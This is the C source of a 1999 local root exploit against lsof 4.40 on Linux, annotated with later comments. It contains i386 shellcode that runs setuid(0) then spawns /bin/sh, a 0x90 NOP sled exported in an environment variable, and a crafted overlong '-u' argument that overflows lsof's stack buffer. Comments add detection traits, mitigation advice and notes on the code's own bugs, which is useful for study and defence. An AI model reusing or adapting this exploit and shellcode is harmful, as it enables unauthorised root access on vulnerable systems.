lsof 4.40 exploit, local root compromise. 0.901 kb.
fd57d63feaa510208b2a6f6141f559fb4c170ddba15ac5de626e6a8d166543b5
/*
* ls0f.c (c) 1999 Subterrain Security
* Written by bind - 1999
*
* Vulnerable: linux machines running lsof 4.40
*
* Cheers to xdr & cripto...
*/
#include <stdio.h>
#include <strings.h>
/* Absolute path of the lsof binary that main() passes to execl(). */
#define LSOF "/usr/sbin/lsof"
/*
 * Payload bytes: i386 machine code followed by the literal string "/bin/sh".
 * The code loads syscall numbers 0x17 and 0x0b before "int 0x80" (\xcd\x80),
 * which on i386 Linux are setuid and execve, and ends with an exit call
 * (eax = 1). The sequence contains no zero bytes, which is why main() can
 * measure it with strlen().
 *
 * Defender note: the leading setuid call only matters if the target process
 * holds root privileges; the byte sequence itself is a stable pattern for
 * content matching in file scanners and memory forensics.
 */
char shellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
/*
 * Copy the current stack pointer (%esp) into %eax using GCC inline assembly.
 * The function has no return statement: it relies on %eax being the i386
 * return-value register and on the compiler leaving it untouched, which the
 * C standard does not guarantee. i386-only; it will not assemble elsewhere.
 *
 * The value is only meaningful as an address guess when stack addresses are
 * predictable across processes; address space layout randomization removes
 * that assumption.
 */
unsigned long get_sp(void)
{ __asm__("movl %esp, %eax"); }
/*
 * Execute LSOF with a crafted "-u" argument and a crafted environment.
 *
 * argv[1] (optional): decimal offset subtracted from this process's stack
 * pointer to form the address that is repeated in the "-u" argument.
 *
 * What the listing shows: a 2000-byte block of 0x90 bytes ending in
 * shellcode is exported as the environment variable CODE, and a short buffer
 * of repeated addresses is passed as the value of "-u". The header states
 * that lsof 4.40 on Linux is vulnerable; presumably that version copies the
 * "-u" value into a fixed-size stack buffer without a length check -- confirm
 * against the lsof 4.40 source or advisory.
 *
 * Defender notes:
 *  - Root impact requires lsof to run with elevated privileges (setuid or
 *    setgid); audit the mode bits of the installed binary and drop them where
 *    they are not needed, and replace the vulnerable 4.40 release.
 *  - Observable traits: an lsof invocation whose "-u" value holds
 *    non-printable bytes, launched with an environment variable containing a
 *    long run of 0x90 bytes.
 *  - A non-executable stack and address randomization both break the
 *    assumptions this technique depends on.
 *
 * NOTE(review): the listing itself has undefined behavior -- offset is read
 * uninitialized when no argument is given, the fill loop stores 32 bytes into
 * the 28-byte ret array, and neither ret nor code is NUL-terminated before
 * being handed to string-based APIs. No return value is produced if execl()
 * fails. The needed headers for strlen/memset/memcpy, atoi/setenv and execl
 * are not included.
 */
int main(int argc, char **argv)
{
/* Payload buffer exported through the environment. */
char code[2000];
/* Holds the repeated address that becomes the "-u" value. */
char ret[28];
int offset, i;
/* Payload length; valid because shellcode contains no zero bytes. */
int len = strlen(shellcode);
/* offset is assigned only when an argument is supplied. */
if(argc > 1) offset = atoi(argv[1]);
/* Fill ret with copies of (stack pointer - offset); assumes a 4-byte long
 * (i386). The <= bound makes the final store land past the end of ret. */
for(i = 0;i <= 28;i += 4)
*(long *)&ret[i] = (unsigned long) get_sp() - offset;
/* 0x90 is the one-byte i386 no-op; pad the whole buffer with it. */
memset(code, 0x90, 2000);
/* Place the payload at the very end of the padding (no terminator added). */
memcpy(code+(2000 - len), shellcode, len);
/* Export the buffer so it is present in the child's environment. */
setenv("CODE", code, 1);
/* Replace this process with lsof; on success this call does not return. */
execl(LSOF,"lsof","-u",ret,NULL);
}